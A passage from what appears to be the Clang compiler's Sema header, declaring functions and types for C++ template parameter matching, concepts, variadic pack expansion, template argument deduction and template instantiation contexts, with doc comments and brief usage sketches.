CheckTemplateArgumentKind CTAK = CTAK_Specified);
bool CheckTemplateTemplateArgument(TemplateTemplateParmDecl *Param,
TemplateParameterList *Params,
TemplateArgumentLoc &Arg);
ExprResult
BuildExpressionFromDeclTemplateArgument(const TemplateArgument &Arg,
QualType ParamType,
SourceLocation Loc);
ExprResult
BuildExpressionFromIntegralTemplateArgument(const TemplateArgument &Arg,
SourceLocation Loc);
/// Enumeration describing how template parameter lists are compared
/// for equality.
enum TemplateParameterListEqualKind {
/// We are matching the template parameter lists of two templates
/// that might be redeclarations.
///
/// \code
/// template<typename T> struct X;
/// template<typename T> struct X;
/// \endcode
TPL_TemplateMatch,
/// We are matching the template parameter lists of two template
/// template parameters as part of matching the template parameter lists
/// of two templates that might be redeclarations.
///
/// \code
/// template<template<int I> class TT> struct X;
/// template<template<int Value> class Other> struct X;
/// \endcode
TPL_TemplateTemplateParmMatch,
/// We are matching the template parameter lists of a template
/// template argument against the template parameter lists of a template
/// template parameter.
///
/// \code
/// template<template<int Value> class Metafun> struct X;
/// template<int Value> struct integer_c;
/// X<integer_c> xic;
/// \endcode
TPL_TemplateTemplateArgumentMatch
};
bool TemplateParameterListsAreEqual(TemplateParameterList *New,
TemplateParameterList *Old,
bool Complain,
TemplateParameterListEqualKind Kind,
SourceLocation TemplateArgLoc
= SourceLocation());
bool CheckTemplateDeclScope(Scope *S, TemplateParameterList *TemplateParams);
/// Called when the parser has parsed a C++ typename
/// specifier, e.g., "typename T::type".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param II the identifier we're retrieving (e.g., 'type' in the example).
/// \param IdLoc the location of the identifier.
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS, const IdentifierInfo &II,
SourceLocation IdLoc);
/// Called when the parser has parsed a C++ typename
/// specifier that ends in a template-id, e.g.,
/// "typename MetaFun::template apply<T1, T2>".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param TemplateLoc the location of the 'template' keyword, if any.
/// \param TemplateName The template name.
/// \param TemplateII The identifier used to name the template.
/// \param TemplateIILoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateLoc,
TemplateTy TemplateName,
IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc,
TypeSourceInfo **TSI,
bool DeducedTSTContext);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc,
bool DeducedTSTContext = true);
TypeSourceInfo *RebuildTypeInCurrentInstantiation(TypeSourceInfo *T,
SourceLocation Loc,
DeclarationName Name);
bool RebuildNestedNameSpecifierInCurrentInstantiation(CXXScopeSpec &SS);
ExprResult RebuildExprInCurrentInstantiation(Expr *E);
bool RebuildTemplateParamsInCurrentInstantiation(
TemplateParameterList *Params);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgumentList &Args);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgument *Args,
unsigned NumArgs);
//===--------------------------------------------------------------------===//
// C++ Concepts
//===--------------------------------------------------------------------===//
Decl *ActOnConceptDefinition(
Scope *S, MultiTemplateParamsArg TemplateParameterLists,
IdentifierInfo *Name, SourceLocation NameLoc, Expr *ConstraintExpr);
RequiresExprBodyDecl *
ActOnStartRequiresExpr(SourceLocation RequiresKWLoc,
ArrayRef<ParmVarDecl *> LocalParameters,
Scope *BodyScope);
void ActOnFinishRequiresExpr();
concepts::Requirement *ActOnSimpleRequirement(Expr *E);
concepts::Requirement *ActOnTypeRequirement(
SourceLocation TypenameKWLoc, CXXScopeSpec &SS, SourceLocation NameLoc,
IdentifierInfo *TypeName, TemplateIdAnnotation *TemplateId);
concepts::Requirement *ActOnCompoundRequirement(Expr *E,
SourceLocation NoexceptLoc);
concepts::Requirement *
ActOnCompoundRequirement(
Expr *E, SourceLocation NoexceptLoc, CXXScopeSpec &SS,
TemplateIdAnnotation *TypeConstraint, unsigned Depth);
concepts::Requirement *ActOnNestedRequirement(Expr *Constraint);
concepts::ExprRequirement *
BuildExprRequirement(
Expr *E, bool IsSatisfied, SourceLocation NoexceptLoc,
concepts::ExprRequirement::ReturnTypeRequirement ReturnTypeRequirement);
concepts::ExprRequirement *
BuildExprRequirement(
concepts::Requirement::SubstitutionDiagnostic *ExprSubstDiag,
bool IsSatisfied, SourceLocation NoexceptLoc,
concepts::ExprRequirement::ReturnTypeRequirement ReturnTypeRequirement);
concepts::TypeRequirement *BuildTypeRequirement(TypeSourceInfo *Type);
concepts::TypeRequirement *
BuildTypeRequirement(
concepts::Requirement::SubstitutionDiagnostic *SubstDiag);
concepts::NestedRequirement *BuildNestedRequirement(Expr *E);
concepts::NestedRequirement *
BuildNestedRequirement(
concepts::Requirement::SubstitutionDiagnostic *SubstDiag);
ExprResult ActOnRequiresExpr(SourceLocation RequiresKWLoc,
RequiresExprBodyDecl *Body,
ArrayRef<ParmVarDecl *> LocalParameters,
ArrayRef<concepts::Requirement *> Requirements,
SourceLocation ClosingBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Variadic Templates (C++0x [temp.variadic])
//===--------------------------------------------------------------------===//
/// Determine whether an unexpanded parameter pack might be permitted in this
/// location. Useful for error recovery.
bool isUnexpandedParameterPackPermitted();
/// The context in which an unexpanded parameter pack is
/// being diagnosed.
///
/// Note that the values of this enumeration line up with the first
/// argument to the \c err_unexpanded_parameter_pack diagnostic.
enum UnexpandedParameterPackContext {
/// An arbitrary expression.
UPPC_Expression = 0,
/// The base type of a class type.
UPPC_BaseType,
/// The type of an arbitrary declaration.
UPPC_DeclarationType,
/// The type of a data member.
UPPC_DataMemberType,
/// The size of a bit-field.
UPPC_BitFieldWidth,
/// The expression in a static assertion.
UPPC_StaticAssertExpression,
/// The fixed underlying type of an enumeration.
UPPC_FixedUnderlyingType,
/// The enumerator value.
UPPC_EnumeratorValue,
/// A using declaration.
UPPC_UsingDeclaration,
/// A friend declaration.
UPPC_FriendDeclaration,
/// A declaration qualifier.
UPPC_DeclarationQualifier,
/// An initializer.
UPPC_Initializer,
/// A default argument.
UPPC_DefaultArgument,
/// The type of a non-type template parameter.
UPPC_NonTypeTemplateParameterType,
/// The type of an exception.
UPPC_ExceptionType,
/// Partial specialization.
UPPC_PartialSpecialization,
/// Microsoft __if_exists.
UPPC_IfExists,
/// Microsoft __if_not_exists.
UPPC_IfNotExists,
/// Lambda expression.
UPPC_Lambda,
/// A block expression.
UPPC_Block,
/// A type constraint.
UPPC_TypeConstraint
};
/// Diagnose unexpanded parameter packs.
///
/// \param Loc The location at which we should emit the diagnostic.
///
/// \param UPPC The context in which we are diagnosing unexpanded
/// parameter packs.
///
/// \param Unexpanded the set of unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPacks(SourceLocation Loc,
UnexpandedParameterPackContext UPPC,
ArrayRef<UnexpandedParameterPack> Unexpanded);
/// If the given type contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The source location where a diagnostic should be emitted.
///
/// \param T The type that is being checked for unexpanded parameter
/// packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc, TypeSourceInfo *T,
UnexpandedParameterPackContext UPPC);
/// If the given expression contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param E The expression that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(Expr *E,
UnexpandedParameterPackContext UPPC = UPPC_Expression);
/// If the given nested-name-specifier contains an unexpanded
/// parameter pack, diagnose the error.
///
/// \param SS The nested-name-specifier that is being checked for
/// unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const CXXScopeSpec &SS,
UnexpandedParameterPackContext UPPC);
/// If the given name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param NameInfo The name (with source location information) that
/// is being checked for unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const DeclarationNameInfo &NameInfo,
UnexpandedParameterPackContext UPPC);
/// If the given template name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The location of the template name.
///
/// \param Template The template name that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc,
TemplateName Template,
UnexpandedParameterPackContext UPPC);
/// If the given template argument contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param Arg The template argument that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(TemplateArgumentLoc Arg,
UnexpandedParameterPackContext UPPC);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgument Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgumentLoc Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param T The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(QualType T,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param TL The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TypeLoc TL,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// nested-name-specifier.
///
/// \param NNS The nested-name-specifier that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(NestedNameSpecifierLoc NNS,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// name.
///
/// \param NameInfo The name that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(const DeclarationNameInfo &NameInfo,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Invoked when parsing a template argument followed by an
/// ellipsis, which creates a pack expansion.
///
/// \param Arg The template argument preceding the ellipsis, which
/// may already be invalid.
///
/// \param EllipsisLoc The location of the ellipsis.
ParsedTemplateArgument ActOnPackExpansion(const ParsedTemplateArgument &Arg,
SourceLocation EllipsisLoc);
/// Invoked when parsing a type followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Type The type preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
TypeResult ActOnPackExpansion(ParsedType Type, SourceLocation EllipsisLoc);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
TypeSourceInfo *CheckPackExpansion(TypeSourceInfo *Pattern,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
QualType CheckPackExpansion(QualType Pattern,
SourceRange PatternRange,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult ActOnPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult CheckPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Determine whether we could expand a pack expansion with the
/// given set of parameter packs into separate arguments by repeatedly
/// transforming the pattern.
///
/// \param EllipsisLoc The location of the ellipsis that identifies the
/// pack expansion.
///
/// \param PatternRange The source range that covers the entire pattern of
/// the pack expansion.
///
/// \param Unexpanded The set of unexpanded parameter packs within the
/// pattern.
///
/// \param ShouldExpand Will be set to \c true if the transformer should
/// expand the corresponding pack expansions into separate arguments. When
/// set, \c NumExpansions must also be set.
///
/// \param RetainExpansion Whether the caller should add an unexpanded
/// pack expansion after all of the expanded arguments. This is used
/// when extending explicitly-specified template argument packs per
/// C++0x [temp.arg.explicit]p9.
///
/// \param NumExpansions The number of separate arguments that will be in
/// the expanded form of the corresponding pack expansion. This is both an
/// input and an output parameter, which can be set by the caller if the
/// number of expansions is known a priori (e.g., due to a prior substitution)
/// and will be set by the callee when the number of expansions is known.
/// The callee must set this value when \c ShouldExpand is \c true; it may
/// set this value in other cases.
///
/// \returns true if an error occurred (e.g., because the parameter packs
/// are to be instantiated with arguments of different lengths), false
/// otherwise. If false, \c ShouldExpand (and possibly \c NumExpansions)
/// must be set.
bool CheckParameterPacksForExpansion(SourceLocation EllipsisLoc,
SourceRange PatternRange,
ArrayRef<UnexpandedParameterPack> Unexpanded,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool &ShouldExpand,
bool &RetainExpansion,
Optional<unsigned> &NumExpansions);
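/// A minimal sketch of the out-parameter protocol described above (inputs
/// assumed to be in scope):
///
/// \code
///   bool ShouldExpand = true, RetainExpansion = false;
///   Optional<unsigned> NumExpansions;
///   if (CheckParameterPacksForExpansion(EllipsisLoc, PatternRange, Unexpanded,
///                                       TemplateArgs, ShouldExpand,
///                                       RetainExpansion, NumExpansions))
///     return true; // mismatched pack sizes; already diagnosed
///   if (ShouldExpand) {
///     // Transform the pattern *NumExpansions times.
///   }
/// \endcode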
/// Determine the number of arguments in the given pack expansion
/// type.
///
/// This routine assumes that the number of arguments in the expansion is
/// consistent across all of the unexpanded parameter packs in its pattern.
///
/// Returns an empty Optional if the type can't be expanded.
Optional<unsigned> getNumArgumentsInExpansion(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Determine whether the given declarator contains any unexpanded
/// parameter packs.
///
/// This routine is used by the parser to disambiguate function declarators
/// with an ellipsis prior to the ')', e.g.,
///
/// \code
/// void f(T...);
/// \endcode
///
/// To determine whether we have an (unnamed) function parameter pack or
/// a variadic function.
///
/// \returns true if the declarator contains any unexpanded parameter packs,
/// false otherwise.
bool containsUnexpandedParameterPacks(Declarator &D);
/// Returns the pattern of the pack expansion for a template argument.
///
/// \param OrigLoc The template argument to expand.
///
/// \param Ellipsis Will be set to the location of the ellipsis.
///
/// \param NumExpansions Will be set to the number of expansions that will
/// be generated from this pack expansion, if known a priori.
TemplateArgumentLoc getTemplateArgumentPackExpansionPattern(
TemplateArgumentLoc OrigLoc,
SourceLocation &Ellipsis,
Optional<unsigned> &NumExpansions) const;
/// Given a template argument that contains an unexpanded parameter pack, but
/// which has already been substituted, attempt to determine the number of
/// elements that will be produced once this argument is fully-expanded.
///
/// This is intended for use when transforming 'sizeof...(Arg)' in order to
/// avoid actually expanding the pack where possible.
Optional<unsigned> getFullyPackExpandedSize(TemplateArgument Arg);
//===--------------------------------------------------------------------===//
// C++ Template Argument Deduction (C++ [temp.deduct])
//===--------------------------------------------------------------------===//
/// Adjust the type \p ArgFunctionType to match the calling convention,
/// noreturn, and optionally the exception specification of \p FunctionType.
/// Deduction often wants to ignore these properties when matching function
/// types.
QualType adjustCCAndNoReturn(QualType ArgFunctionType, QualType FunctionType,
bool AdjustExceptionSpec = false);
/// Describes the result of template argument deduction.
///
/// The TemplateDeductionResult enumeration describes the result of
/// template argument deduction, as returned from
/// DeduceTemplateArguments(). The separate TemplateDeductionInfo
/// structure provides additional information about the results of
/// template argument deduction, e.g., the deduced template argument
/// list (if successful) or the specific template parameters or
/// deduced arguments that were involved in the failure.
enum TemplateDeductionResult {
/// Template argument deduction was successful.
TDK_Success = 0,
/// The declaration was invalid; do nothing.
TDK_Invalid,
/// Template argument deduction exceeded the maximum template
/// instantiation depth (which has already been diagnosed).
TDK_InstantiationDepth,
/// Template argument deduction did not deduce a value
/// for every template parameter.
TDK_Incomplete,
/// Template argument deduction did not deduce a value for every
/// expansion of an expanded template parameter pack.
TDK_IncompletePack,
/// Template argument deduction produced inconsistent
/// deduced values for the given template parameter.
TDK_Inconsistent,
/// Template argument deduction failed due to inconsistent
/// cv-qualifiers on a template parameter type that would
/// otherwise be deduced, e.g., we tried to deduce T in "const T"
/// but were given a non-const "X".
TDK_Underqualified,
/// Substitution of the deduced template argument values
/// resulted in an error.
TDK_SubstitutionFailure,
/// After substituting deduced template arguments, a dependent
/// parameter type did not match the corresponding argument.
TDK_DeducedMismatch,
/// After substituting deduced template arguments, an element of
/// a dependent parameter type did not match the corresponding element
/// of the corresponding argument (when deducing from an initializer list).
TDK_DeducedMismatchNested,
/// A non-dependent component of the parameter did not match the
/// corresponding component of the argument.
TDK_NonDeducedMismatch,
/// When performing template argument deduction for a function
/// template, there were too many call arguments.
TDK_TooManyArguments,
/// When performing template argument deduction for a function
/// template, there were too few call arguments.
TDK_TooFewArguments,
/// The explicitly-specified template arguments were not valid
/// template arguments for the given template.
TDK_InvalidExplicitArguments,
/// Checking non-dependent argument conversions failed.
TDK_NonDependentConversionFailure,
/// The deduced arguments did not satisfy the constraints associated
/// with the template.
TDK_ConstraintsNotSatisfied,
/// Deduction failed; that's all we know.
TDK_MiscellaneousDeductionFailure,
/// CUDA Target attributes do not match.
TDK_CUDATargetMismatch
};
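/// A minimal sketch of consuming this result (here \c Partial,
/// \c TemplateArgs and \c Loc are assumed to be in scope):
///
/// \code
///   sema::TemplateDeductionInfo Info(Loc);
///   if (DeduceTemplateArguments(Partial, TemplateArgs, Info) != TDK_Success)
///     return nullptr; // Info records the failing parameter/argument
/// \endcode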
TemplateDeductionResult
DeduceTemplateArguments(ClassTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(VarTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult SubstituteExplicitTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo &ExplicitTemplateArgs,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
SmallVectorImpl<QualType> &ParamTypes, QualType *FunctionType,
sema::TemplateDeductionInfo &Info);
/// \brief A function argument from which we performed template argument
/// deduction for a call.
struct OriginalCallArg {
OriginalCallArg(QualType OriginalParamType, bool DecomposedParam,
unsigned ArgIdx, QualType OriginalArgType)
: OriginalParamType(OriginalParamType),
DecomposedParam(DecomposedParam), ArgIdx(ArgIdx),
OriginalArgType(OriginalArgType) {}
QualType OriginalParamType;
bool DecomposedParam;
unsigned ArgIdx;
QualType OriginalArgType;
};
TemplateDeductionResult FinishTemplateArgumentDeduction(
FunctionTemplateDecl *FunctionTemplate,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
unsigned NumExplicitlySpecified, FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
SmallVectorImpl<OriginalCallArg> const *OriginalCallArgs = nullptr,
bool PartialOverloading = false,
llvm::function_ref<bool()> CheckNonDependent = []{ return false; });
TemplateDeductionResult DeduceTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
FunctionDecl *&Specialization, sema::TemplateDeductionInfo &Info,
bool PartialOverloading,
llvm::function_ref<bool(ArrayRef<QualType>)> CheckNonDependent);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ArgFunctionType,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
QualType ToType,
CXXConversionDecl *&Specialization,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
/// Substitute Replacement for \p auto in \p TypeWithAuto
QualType SubstAutoType(QualType TypeWithAuto, QualType Replacement);
/// Substitute Replacement for auto in TypeWithAuto
TypeSourceInfo* SubstAutoTypeSourceInfo(TypeSourceInfo *TypeWithAuto,
QualType Replacement);
/// Completely replace the \c auto in \p TypeWithAuto by
/// \p Replacement. This does not retain any \c auto type sugar.
QualType ReplaceAutoType(QualType TypeWithAuto, QualType Replacement);
/// Result type of DeduceAutoType.
enum DeduceAutoResult {
DAR_Succeeded,
DAR_Failed,
DAR_FailedAlreadyDiagnosed
};
DeduceAutoResult
DeduceAutoType(TypeSourceInfo *AutoType, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None,
bool IgnoreConstraints = false);
DeduceAutoResult
DeduceAutoType(TypeLoc AutoTypeLoc, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None,
bool IgnoreConstraints = false);
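/// A minimal sketch of deducing a variable's type (here \c TSI, \c Init and
/// \c VDecl are assumed to be the declared 'auto' type, the initializer and
/// the variable being declared):
///
/// \code
///   QualType DeducedType;
///   if (DeduceAutoType(TSI, Init, DeducedType) == DAR_Failed)
///     DiagnoseAutoDeductionFailure(VDecl, Init);
/// \endcode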
void DiagnoseAutoDeductionFailure(VarDecl *VDecl, Expr *Init);
bool DeduceReturnType(FunctionDecl *FD, SourceLocation Loc,
bool Diagnose = true);
/// Declare implicit deduction guides for a class template if we've
/// not already done so.
void DeclareImplicitDeductionGuides(TemplateDecl *Template,
SourceLocation Loc);
QualType DeduceTemplateSpecializationFromInitializer(
TypeSourceInfo *TInfo, const InitializedEntity &Entity,
const InitializationKind &Kind, MultiExprArg Init);
QualType deduceVarTypeFromInitializer(VarDecl *VDecl, DeclarationName Name,
QualType Type, TypeSourceInfo *TSI,
SourceRange Range, bool DirectInit,
Expr *Init);
TypeLoc getReturnTypeLoc(FunctionDecl *FD) const;
bool DeduceFunctionTypeFromReturnExpr(FunctionDecl *FD,
SourceLocation ReturnLoc,
Expr *&RetExpr, AutoType *AT);
FunctionTemplateDecl *getMoreSpecializedTemplate(
FunctionTemplateDecl *FT1, FunctionTemplateDecl *FT2, SourceLocation Loc,
TemplatePartialOrderingContext TPOC, unsigned NumCallArguments1,
unsigned NumCallArguments2, bool Reversed = false);
UnresolvedSetIterator
getMostSpecialized(UnresolvedSetIterator SBegin, UnresolvedSetIterator SEnd,
TemplateSpecCandidateSet &FailedCandidates,
SourceLocation Loc,
const PartialDiagnostic &NoneDiag,
const PartialDiagnostic &AmbigDiag,
const PartialDiagnostic &CandidateDiag,
bool Complain = true, QualType TargetType = QualType());
ClassTemplatePartialSpecializationDecl *
getMoreSpecializedPartialSpecialization(
ClassTemplatePartialSpecializationDecl *PS1,
ClassTemplatePartialSpecializationDecl *PS2,
SourceLocation Loc);
bool isMoreSpecializedThanPrimary(ClassTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
VarTemplatePartialSpecializationDecl *getMoreSpecializedPartialSpecialization(
VarTemplatePartialSpecializationDecl *PS1,
VarTemplatePartialSpecializationDecl *PS2, SourceLocation Loc);
bool isMoreSpecializedThanPrimary(VarTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
bool isTemplateTemplateParameterAtLeastAsSpecializedAs(
TemplateParameterList *PParam, TemplateDecl *AArg, SourceLocation Loc);
void MarkUsedTemplateParameters(const Expr *E, bool OnlyDeduced,
unsigned Depth, llvm::SmallBitVector &Used);
void MarkUsedTemplateParameters(const TemplateArgumentList &TemplateArgs,
bool OnlyDeduced,
unsigned Depth,
llvm::SmallBitVector &Used);
void MarkDeducedTemplateParameters(
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced) {
return MarkDeducedTemplateParameters(Context, FunctionTemplate, Deduced);
}
static void MarkDeducedTemplateParameters(ASTContext &Ctx,
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced);
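/// Sketch: compute which template parameters of a function template are
/// deducible from its function parameters ('S' and 'FunTmpl' assumed).
/// \code
///   llvm::SmallBitVector Deduced(
///       FunTmpl->getTemplateParameters()->size());
///   S.MarkDeducedTemplateParameters(FunTmpl, Deduced);
/// \endcode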
//===--------------------------------------------------------------------===//
// C++ Template Instantiation
//
MultiLevelTemplateArgumentList
getTemplateInstantiationArgs(NamedDecl *D,
const TemplateArgumentList *Innermost = nullptr,
bool RelativeToPrimary = false,
const FunctionDecl *Pattern = nullptr);
/// A context in which code is being synthesized (where a source location
/// alone is not sufficient to identify the context). This covers template
/// instantiation and various forms of implicitly-generated functions.
struct CodeSynthesisContext {
/// The kind of template instantiation we are performing
enum SynthesisKind {
/// We are instantiating a template declaration. The entity is
/// the declaration we're instantiating (e.g., a CXXRecordDecl).
TemplateInstantiation,
/// We are instantiating a default argument for a template
/// parameter. The Entity is the template parameter whose argument is
/// being instantiated, the Template is the template, and the
/// TemplateArgs/NumTemplateArguments provide the template arguments as
/// specified.
DefaultTemplateArgumentInstantiation,
/// We are instantiating a default argument for a function.
/// The Entity is the ParmVarDecl, and TemplateArgs/NumTemplateArgs
/// provides the template arguments as specified.
DefaultFunctionArgumentInstantiation,
/// We are substituting explicit template arguments provided for
/// a function template. The entity is a FunctionTemplateDecl.
ExplicitTemplateArgumentSubstitution,
/// We are substituting template arguments determined as part of
/// template argument deduction for either a class template
/// partial specialization or a function template. The
/// Entity is either a {Class|Var}TemplatePartialSpecializationDecl or
/// a TemplateDecl.
DeducedTemplateArgumentSubstitution,
/// We are substituting prior template arguments into a new
/// template parameter. The template parameter itself is either a
/// NonTypeTemplateParmDecl or a TemplateTemplateParmDecl.
PriorTemplateArgumentSubstitution,
/// We are checking the validity of a default template argument that
/// has been used when naming a template-id.
DefaultTemplateArgumentChecking,
/// We are computing the exception specification for a defaulted special
/// member function.
ExceptionSpecEvaluation,
/// We are instantiating the exception specification for a function
/// template which was deferred until it was needed.
ExceptionSpecInstantiation,
/// We are instantiating a requirement of a requires expression.
RequirementInstantiation,
/// We are checking the satisfaction of a nested requirement of a requires
/// expression.
NestedRequirementConstraintsCheck,
/// We are declaring an implicit special member function.
DeclaringSpecialMember,
/// We are declaring an implicit 'operator==' for a defaulted
/// 'operator<=>'.
DeclaringImplicitEqualityComparison,
/// We are defining a synthesized function (such as a defaulted special
/// member).
DefiningSynthesizedFunction,
/// We are checking the constraints associated with a constrained entity or
/// the constraint expression of a concept. This includes the checks that
/// atomic constraints have the type 'bool' and that they can be constant
/// evaluated.
ConstraintsCheck,
/// We are substituting template arguments into a constraint expression.
ConstraintSubstitution,
/// We are normalizing a constraint expression.
ConstraintNormalization,
/// We are substituting into the parameter mapping of an atomic constraint
/// during normalization.
ParameterMappingSubstitution,
/// We are rewriting a comparison operator in terms of an operator<=>.
RewritingOperatorAsSpaceship,
/// Added for Template instantiation observation.
/// Memoization means we are _not_ instantiating a template because
/// it is already instantiated (but we entered a context where we
/// would have had to if it was not already instantiated).
Memoization
} Kind;
/// Was the enclosing context a non-instantiation SFINAE context?
bool SavedInNonInstantiationSFINAEContext;
/// The point of instantiation or synthesis within the source code.
SourceLocation PointOfInstantiation;
/// The entity that is being synthesized.
Decl *Entity;
/// The template (or partial specialization) in which we are
/// performing the instantiation, for substitutions of prior template
/// arguments.
NamedDecl *Template;
/// The list of template arguments we are substituting, if they
/// are not part of the entity.
const TemplateArgument *TemplateArgs;
// FIXME: Wrap this union around more members, or perhaps store the
// kind-specific members in the RAII object owning the context.
union {
/// The number of template arguments in TemplateArgs.
unsigned NumTemplateArgs;
/// The special member being declared or defined.
CXXSpecialMember SpecialMember;
};
ArrayRef<TemplateArgument> template_arguments() const {
assert(Kind != DeclaringSpecialMember);
return {TemplateArgs, NumTemplateArgs};
}
/// The template deduction info object associated with the
/// substitution or checking of explicit or deduced template arguments.
sema::TemplateDeductionInfo *DeductionInfo;
/// The source range that covers the construct that caused
/// the instantiation, e.g., the template-id that causes a class
/// template instantiation.
SourceRange InstantiationRange;
CodeSynthesisContext()
: Kind(TemplateInstantiation),
SavedInNonInstantiationSFINAEContext(false), Entity(nullptr),
Template(nullptr), TemplateArgs(nullptr), NumTemplateArgs(0),
DeductionInfo(nullptr) {}
/// Determines whether this template is an actual instantiation
/// that should be counted toward the maximum instantiation depth.
bool isInstantiationRecord() const;
};
/// List of active code synthesis contexts.
///
/// This vector is treated as a stack. As synthesis of one entity requires
/// synthesis of another, additional contexts are pushed onto the stack.
SmallVector<CodeSynthesisContext, 16> CodeSynthesisContexts;
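/// Sketch of walking the active stack, outermost context first ('S' is an
/// assumed Sema instance; 'noteLocation' is a hypothetical helper).
/// \code
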